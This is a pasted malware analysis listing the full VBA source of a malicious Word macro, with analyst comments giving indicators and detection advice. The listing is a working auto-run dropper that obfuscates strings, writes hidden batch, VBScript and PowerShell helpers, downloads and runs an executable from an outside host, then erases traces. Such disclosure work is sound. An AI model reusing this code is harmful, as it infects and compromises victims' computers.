dynamoo

Malicious Word macro

Dec 5th, 2014
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
      ' Module header as emitted by a VBA export: VB_Name identifies this as the document's own
      ' ThisDocument module, so the macros that follow travel inside the document file itself.
  9. Sub Auto_Open()
      ' Auto-run entry point. Auto_Open is a macro name Office runs without user action once macros
      ' are enabled; it does nothing except hand control to h(), the dropper routine in this module.
  10.     h
  11. End Sub
  12. Sub h()
      ' Dropper routine, reached from every auto-run entry point in this module.
      ' Analyst summary (all of it read off the statements in this Sub):
      '   1. Assembles file names and paths from Chr()/Asc() fragments so they do not appear as
      '      plain strings in the macro source (defeats naive string matching).
      '   2. Deletes earlier copies of its own drop files.
      '   3. Reads the Windows version over WMI and takes one of two branches.
      '   4. Writes helper scripts (.bat + .vbs, plus .ps1 on newer Windows) into a Temp directory.
      '      They fetch hxxp://hiro-wish[.]com/js/bin.exe, save it as 444.exe, run it, and then
      '      delete the helper scripts again.
      '   5. Edits the visible document text (findTest, secondTest, marker clean-up loops).
      ' Host indicators visible here: adobeacd-update.ps1 / .bat / .vbs and 444.exe under
      ' c:\Users\<user>\AppData\Local\Temp; adobeacd-updatexp.vbs, adobeacd-update.bat and 444.exe
      ' under c:\Windows\Temp.
      ' Detection angle: the Office process starts a hidden .bat, which starts cscript.exe, which
      ' (newer-Windows branch) starts powershell.exe with "-ExecutionPolicy bypass -file"; an Office
      ' application spawning script interpreters is the high-signal event to alert on or block.
  13. Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
      ' The current account name is read from the environment to build per-user Temp paths.
      ' Decoded names: PST1 = adobeacd-update.ps1 (Chr(115) = "s"), BART = adobeacd-update.bat,
      ' VBT1 = adobeacd-update.vbs (Chr(118) = "v"), VBTXP = adobeacd-updatexp.vbs.
      ' ASDSA (and ASJDKHSJADASDSA below) are filler strings that are never read again in this Sub.
  14.      USER = Environ("username")
  15.      PST1 = "adobeacd-update.p" + Chr(115) + "1"
  16.      BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t"))
  17.      ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
  18.      VBT1 = "adobeacd-update." + Chr(118) + "bs"
  19.      VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s"
  20.      
  21.  
      ' Full drop paths. MY_FILENDIR = the .ps1, MY_FILEDIR = the .bat, MY_FILDIR = the .vbs (all in
      ' the user's Temp directory); XPFILEDIR / XPBARTFILEDIR = the .vbs / .bat in c:\Windows\Temp.
  22.      MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
  23.      ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
  24.      MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
  25.      MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
  26.      XPFILEDIR = "c:\Windows\Temp\" + VBTXP
  27.      XPBARTFILEDIR = "c:\Windows\Temp\" + BART
  28.      
      ' Errors are suppressed from here on, so a missing file or a failed write never raises a
      ' dialog. Each stanza clears the file attributes of a previous drop file and deletes it.
  29.       On Error Resume Next
  30.      SetAttr MY_FILENDIR, vbNormal
  31.      
  32.      If (Len(Dir(MY_FILENDIR)) <> 0) Then
  33.       Kill MY_FILENDIR
  34.      End If
  35.      
  36.      On Error Resume Next
  37.      SetAttr MY_FILEDIR, vbNormal
  38.      If (Dir(MY_FILEDIR) <> "") Then
  39.       Kill MY_FILEDIR
  40.      End If
  41.      
  42.      On Error Resume Next
  43.      SetAttr MY_FILDIR, vbNormal
  44.      If (Dir(MY_FILDIR) <> "") Then
  45.       Kill MY_FILDIR
  46.      End If
  47.      
  48.      On Error Resume Next
  49.      SetAttr XPFILEDIR, vbNormal
  50.      If (Dir(XPFILEDIR) <> "") Then
  51.       Kill XPFILEDIR
  52.      End If
  53.      
  54.      Dim FileNumber As Integer
  55.      Dim FileNumb As Integer
  56.      Dim FileNu As Integer
  57.      Dim mttt As Integer
  58.      Dim retVal As Variant
  59.      'Dim winver As Integer
  60.     FileNumber = FreeFile
  61.      FileNumb = FreeFile
  62.      FileNu = FreeFile
  63.      
      ' OS fingerprinting through WMI (Win32_OperatingSystem). The first loop builds SysReport,
      ' which is not used again in this Sub; the second loop keeps the Version string.
  64.      Dim objWMIService As Variant
  65.     Dim colOperatingSystems As Variant
  66.     Dim objOperatingSystem As Variant
  67.     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  68.     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  69.     For Each objOperatingSystem In colOperatingSystems
  70.         SysReport = SysReport & "The operating system on this computer is " & _
  71.             objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
  72.     Next
  73.      
  74.      Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  75.      Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  76.      For Each objOperatingSystem In colOperatingSystems
  77.         winverstr = objOperatingSystem.Version
  78.     Next
  79.    
  80.    
      ' Val() stops at the second dot, so a version string such as "6.1.7601" (constructed example)
      ' becomes 6.1. The threshold 5.5 used below separates version 5.x from 6.x and later.
  81.     winver = Val(winverstr)
  82.     WaitFor (1)
  83.      
      ' --- Branch for version <= 5.5 (presumably the Windows XP generation, matching the XP*
      ' variable names). Everything is dropped into c:\Windows\Temp.
      ' First the batch file: it pings 1.1.2.2 (apparently just a delay), runs the .vbs downloader
      ' through cscript.exe, starts c:\Windows\Temp\444.exe, then loops deleting the .vbs and
      ' itself until neither file exists.
  84. If (winver <= 5.5) Then
  85.      Open XPBARTFILEDIR For Output As #FileNu
  86.      Print #FileNu, "@echo off"
  87.      Print #FileNu, "ping 1.1.2.2 -n 2"
  88.      Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
  89.      Print #FileNu, "ping 1.1.2.2 -n 2"
  90.      Print #FileNu, "c:\Windows\Temp\444.exe"
  91.      Print #FileNu, ":loop"
  92.      Print #FileNu, "ping 1.1.2.2 -n 1"
  93.      Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
  94.      Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
  95.      Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
  96.      Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
  97.      Print #FileNu, "exit"
  98.      Close #FileNu
  99.      WaitFor (2)
      ' mttt is only a base for Chr() arithmetic below: Chr(34) is a double quote, Chr(88) "X",
      ' Chr(77) "M", Chr(76) "L", followed by "HTTP" - the XMLHTTP component name is never spelled out.
  100.      mttt = 88
  101.  
      ' Then the VBScript downloader: a synchronous HTTP GET of the payload URL (strRT) and, on
      ' status 200, the response body is written through a binary ADODB.Stream (Type = 1) to
      ' c:\Windows\Temp\444.exe (strTecation). The WScript.Shell object created on the last
      ' generated line is not used by the script; the batch file is what starts 444.exe.
  102.      Open XPFILEDIR For Output As #FileNumber
  103.      Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://hiro-wish.com/js/bin" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  104.      Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  105.      
  106.      Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
  107.      Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
  108.      
  109.      Print #FileNumber, "objXMLHTTP.send() "
  110.      Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
  111.      
  112.      Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
  113.      
  114.      Print #FileNumber, "objADOStream.Open "
  115.      Print #FileNumber, "objADOStream.Type = 1"
  116.      Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
  117.      Print #FileNumber, "objADOStream.Position = 0 "
  118.      Print #FileNumber, "objADOStream.SaveToFile strTecation "
  119.      Print #FileNumber, "objADOStream.Close "
  120.      Print #FileNumber, "Set objADOStream = Nothing "
  121.      Print #FileNumber, "End if "
  122.      Print #FileNumber, "Set objXMLHTTP = Nothing"
  123.      Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
  124.      Close #FileNumber
  125.      
  126.      WaitFor (1)
  127.      
      ' Launch the batch file; window style 0 (vbHide) keeps the console window off screen.
  128.      retVal = Shell(XPBARTFILEDIR, 0)
  129.      
  130.      
  131. End If
  132.      
  133.      
      ' --- Branch for version > 5.5. Three files go into the user's Temp directory.
      ' (1) PowerShell script adobeacd-update.ps1: creates a System.Net.WebClient, sets a fixed
      '     Safari-on-Mac User-Agent header (a useful proxy-log indicator when it comes from a
      '     Windows host), downloads the payload URL to Temp\444.exe, sleeps 15 seconds, runs it via
      '     cmd.exe /c, toggles the Hidden attribute on the three helper scripts, then removes the
      '     .vbs, the .bat, 444.exe and finally the script itself.
      '     $hashroot and $hash are assigned but not referenced again in the generated script.
  134. If (winver > 5.5) Then
  135.      Open MY_FILENDIR For Output As #FileNumber
  136.      Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';"
  137.      Print #FileNumber, "$hash = '0';"
  138.      Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
  139.      Print #FileNumber, "$url  = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';"
  140.      Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
  141.      Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
  142.      Print #FileNumber, "$down" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
  143.      Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  144.      Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
  145.      Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
  146.      Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
  147.      Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
  148.      Print #FileNumber, "Start-Sleep -s 15;"
  149.      Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
  150.      Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
  151.      Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
  152.      Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
  153.      Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  154.      Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  155.      Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  156.      Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  157.      Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
  158.      Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
  159.      Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  160.      Close #FileNumber
  161.    
      ' (2) VBScript launcher adobeacd-update.vbs: its generated Run line starts powershell.exe with
      '     "-noexit -ExecutionPolicy bypass -noprofile -file <the .ps1>", window style 0 (hidden),
      '     waiting for it to return. That command line is a stable process-creation indicator.
  162.     Open MY_FILDIR For Output As #FileNumb
  163.     Print #FileNumb, "Dim dff"
  164.     Print #FileNumb, "dff = 68"
  165.     Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
  166.     Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
  167.     Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
  168.     Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
  169.     Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
  170.     Close #FileNumb
  171.    
      ' (3) Batch file adobeacd-update.bat: ping delay, "chcp 1251" (switches the console to the
      '     Windows Cyrillic code page), then cscript.exe on the .vbs launcher above.
  172.     Open MY_FILEDIR For Output As #FileNu
  173.     Print #FileNu, "@echo off"
  174.     Print #FileNu, "ping 1.1.2.2 -n 2"
  175.     Print #FileNu, "chcp 1251"
  176.     Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
  177.     Print #FileNu, "exit"
  178.     Close #FileNu
  179.        
  180.     SetAttr MY_FILENDIR, vbNormal
  181.     SetAttr MY_FILEDIR, vbNormal
  182.     SetAttr MY_FILDIR, vbNormal
  183.      
  184.     WaitFor (1)
  185.    
      ' Start of the chain: the batch file is launched with a hidden window (style 0).
  186.     retVal = Shell(MY_FILEDIR, 0)
  187. End If
  188.      
  189.      
      ' Document manipulation, run on both branches once the helper scripts have been started.
      ' findTest and secondTest act on the text between <select>...</select> and <inbox>...</inbox>
      ' markers; the four loops that follow replace the marker strings themselves with a space in
      ' every story range of the document. The marker literals are split ("<" & "sel" & "ect>") so
      ' they do not appear whole in the macro source.
  189.      findTest
  190.     secondTest
  191.     For Each myStoryRange In ActiveDocument.StoryRanges
  192.     With myStoryRange.Find
  193.         .Text = "<" & "sel" & "ect>"
  194.         .Replacement.Text = " "
  195.         .Wrap = wdFindContinue
  196.         .Execute Replace:=wdReplaceAll
  197.     End With
  198.     Next myStoryRange
  199.  
  200.     For Each myStoryRange In ActiveDocument.StoryRanges
  201.     With myStoryRange.Find
  202.         .Text = "</s" & "ele" & "ct>"
  203.         .Replacement.Text = " "
  204.         .Wrap = wdFindContinue
  205.         .Execute Replace:=wdReplaceAll
  206.     End With
  207.     Next myStoryRange
  208.    
  209.     For Each myStoryRange In ActiveDocument.StoryRanges
  210.     With myStoryRange.Find
  211.         .Text = "<" & "in" & "box>"
  212.         .Replacement.Text = " "
  213.         .Wrap = wdFindContinue
  214.         .Execute Replace:=wdReplaceAll
  215.     End With
  216.     Next myStoryRange
  217.  
  218.     For Each myStoryRange In ActiveDocument.StoryRanges
  219.     With myStoryRange.Find
  220.         .Text = "</" & "in" & "box>"
  221.         .Replacement.Text = " "
  222.         .Wrap = wdFindContinue
  223.         .Execute Replace:=wdReplaceAll
  224.     End With
  225.     Next myStoryRange
  226.      
  227.  
  228. End Sub
  229. Sub WaitFor(NumOfSeconds As Long)
      ' Delay helper: spins until Timer (seconds since midnight) passes the target value, calling
      ' DoEvents on every pass so the host application keeps processing events while it waits.
      ' h() calls it between writing the helper scripts and launching them.
      ' Parameter: NumOfSeconds - length of the pause in seconds.
  230. Dim SngSec As Long
  231. SngSec = Timer + NumOfSeconds
  232.  
  233. Do While Timer < SngSec
  234. DoEvents
  235. Loop
  236.  
  237. End Sub
  238.  
  239. Sub AutoOpen()
      ' Second auto-run hook: AutoOpen is the macro name Word runs when a document is opened.
      ' It forwards to Auto_Open, which calls the dropper routine h().
  240.     Auto_Open
  241. End Sub
  242. Sub Workbook_Open()
      ' Third auto-run hook, named after Excel's workbook-open event; it also forwards to
      ' Auto_Open. Having all three names lets the same module fire from either host application.
  243.     Auto_Open
  244. End Sub
  245. Sub findTest()
      ' Deletes the document text that sits between the first "<select>" marker and the following
      ' "</select>" marker. The document body is not part of this listing; presumably this is the
      ' lure text shown before macros are enabled - confirm against the document itself.
      ' ASKASAIEJ, ASKUKKIEJ and ASKSASADW are filler assignments that are never read.
  246. Dim firstTerm As String
  247. Dim secondTerm As String
  248. Dim rrtt As Range
  249. Dim selRange As Range
  250. Dim selectedText As String
  251.  
  252. Set rrtt = ActiveDocument.Range
  253. firstTerm = "<se" & "lect>"
  254. secondTerm = "</sel" & "ect>"
  255. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
  256. With rrtt.Find
  257. .Text = firstTerm
  258. .MatchWholeWord = True
  259. .Execute
  260. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
      ' Collapse to the end of the opening marker; selRange starts right after it.
  261. rrtt.Collapse direction:=wdCollapseEnd
  262. Set selRange = ActiveDocument.Range
  263. selRange.Start = rrtt.End
  264. .Text = secondTerm
  265. .MatchWholeWord = True
  266. .Execute
  267. ASKSASADW = "asjldklas"
      ' Collapse to the start of the closing marker; selRange ends right before it and is deleted.
  268. rrtt.Collapse direction:=wdCollapseStart
  269. selRange.End = rrtt.Start
  270. selectedText = selRange.Delete
  271. End With
  272. End Sub
  273.  
  274. Sub secondTest()
      ' Sets the font colour of the text between the first "<inbox>" marker and the following
      ' "</inbox>" marker to black. Presumably that text was not visible before (for example in a
      ' colour matching the page) and is revealed once the macro has run - the document body is not
      ' part of this listing, so confirm against the document itself.
      ' The ASK... assignments are filler strings that are never read; myRanget is declared but unused.
  275. Dim firstTerm As String
  276. Dim secondTerm As String
  277. Dim myRanget As Range
  278. Dim yytt As Range
  279. Dim selRanget As Range
  280. Dim selectedTextt As String
  281.  
  282. Set yytt = ActiveDocument.Range
  283. firstTerm = "<in" & "box>"
  284. secondTerm = "</in" & "box>"
  285. ASKIEJSASAHBDJ = "ask as8d j asdasl;a skdjasdnkjh12kh1 sad"
  286. With yytt.Find
  287. .Text = firstTerm
  288. .MatchWholeWord = True
  289. .Execute
  290. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
      ' Collapse to the end of the opening marker; selRanget starts right after it.
  291. yytt.Collapse direction:=wdCollapseEnd
  292. ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a skdjasdnkjh12kh1 sad"
  293. Set selRanget = ActiveDocument.Range
  294. selRanget.Start = yytt.End
  295. .Text = secondTerm
  296. .MatchWholeWord = True
  297. .Execute
  298. ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a skdjasdnkjh12kh1 sad"
      ' Collapse to the start of the closing marker; selRanget ends right before it and is recoloured.
  299. yytt.Collapse direction:=wdCollapseStart
  300. selRanget.End = yytt.Start
  301. selectedTextt = selRanget
  302. selRanget.Font.Color = wdColorBlack
  303. End With
  304. End Sub